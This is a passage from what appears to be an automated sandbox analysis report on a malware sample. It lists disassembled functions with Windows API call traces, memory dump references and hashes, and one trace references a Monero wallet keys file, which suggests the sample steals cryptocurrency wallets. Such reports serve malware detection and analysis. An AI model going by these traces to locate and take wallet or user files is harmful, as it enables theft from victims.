                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                      • String ID:
                      • API String ID: 3729781310-0
                      • Opcode ID: 0337c35713641376a02f3bac65f31860b07bc84639c53be507861fc8cbd6f4d6
                      • Instruction ID: 79fd95b388afa495cd2e78ff5ae41d128cccec8e88c34280f04919dbc61bb40d
                      • Opcode Fuzzy Hash: 0337c35713641376a02f3bac65f31860b07bc84639c53be507861fc8cbd6f4d6
                      • Instruction Fuzzy Hash: D9315C71E0125CDFDB15DFE0CC49BEDB779EB44300F20855AE506AA1C4DB74AA89CB51
                      Function 003E8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003F05B7), ref: 003E86CA
                      • Process32First.KERNEL32(?,00000128), ref: 003E86DE
                      • Process32Next.KERNEL32(?,00000128), ref: 003E86F3
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • CloseHandle.KERNEL32(?), ref: 003E8761
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: be5e5122a5fa865e1e86e6f670b846d3ac0e2c26ba453f866efe48e2437a1bb4
                      • Instruction ID: 3002a92e3b651fa584cd0c9a9e6462bb3060f7fdbf2607e04160a1a9d15469a9
                      • Opcode Fuzzy Hash: be5e5122a5fa865e1e86e6f670b846d3ac0e2c26ba453f866efe48e2437a1bb4
                      • Instruction Fuzzy Hash: 4C316B71901668ABCB26DF96CC81FEEB778EF45700F104299F10AA61E0DB306E45CFA1
                      Function 003E7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003F0E00,00000000,?), ref: 003E79B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E79B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,003F0E00,00000000,?), ref: 003E79C4
                      • wsprintfA.USER32 ref: 003E79F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: fa9d3de65e70903c3bcee01fbbb5760237669007d272c92709917648d6cf0a0a
                      • Instruction ID: b68994cedd765314be5292fab41c950180fbe317c62d7f196354dec4272cdc39
                      • Opcode Fuzzy Hash: fa9d3de65e70903c3bcee01fbbb5760237669007d272c92709917648d6cf0a0a
                      • Instruction Fuzzy Hash: 221127B2904118ABCB14DFCADD45BFEB7F9FB4CB11F14821AF605A2280E2395940CBB1
                      Function 003EC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 003EC74E
                        • Part of subcall function 003EBF9F: __amsg_exit.LIBCMT ref: 003EBFAF
                      • __getptd.LIBCMT ref: 003EC765
                      • __amsg_exit.LIBCMT ref: 003EC773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 003EC797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: 16d6c25a955dba097ec88fe52d2982078d4f877278221222ea18fabd7f4d4a5c
                      • Instruction ID: 52a99e88995cd7ef236fd23e4340d4c71f3da4ba8e5aa9e70b7b4e4c214e928f
                      • Opcode Fuzzy Hash: 16d6c25a955dba097ec88fe52d2982078d4f877278221222ea18fabd7f4d4a5c
                      • Instruction Fuzzy Hash: 3DF0F0329106B09FD723BBBA880279EB3A06F00720F214348F004AE2D2CB246842CE56
                      Function 003E4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4F7A
                      • lstrcat.KERNEL32(?,003F1070), ref: 003E4F97
                      • lstrcat.KERNEL32(?,01089060), ref: 003E4FAB
                      • lstrcat.KERNEL32(?,003F1074), ref: 003E4FBD
                        • Part of subcall function 003E4910: wsprintfA.USER32 ref: 003E492C
                        • Part of subcall function 003E4910: FindFirstFileA.KERNEL32(?,?), ref: 003E4943
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F0FDC), ref: 003E4971
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F0FE0), ref: 003E4987
                        • Part of subcall function 003E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003E4B7D
                        • Part of subcall function 003E4910: FindClose.KERNEL32(000000FF), ref: 003E4B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 2962c47080b59aecfce102d12fa64d6ff0c3b93575b950df51e72ac46c0267d0
                      • Instruction ID: 64faaa9bf12b62592f3161592bf7942bb0c842749416383234f8397f980c90d5
                      • Opcode Fuzzy Hash: 2962c47080b59aecfce102d12fa64d6ff0c3b93575b950df51e72ac46c0267d0
                      • Instruction Fuzzy Hash: 6221DA7BD00218A7C755FBF0EC46EED333EAB54300F008659B659961C2EE749AC98B92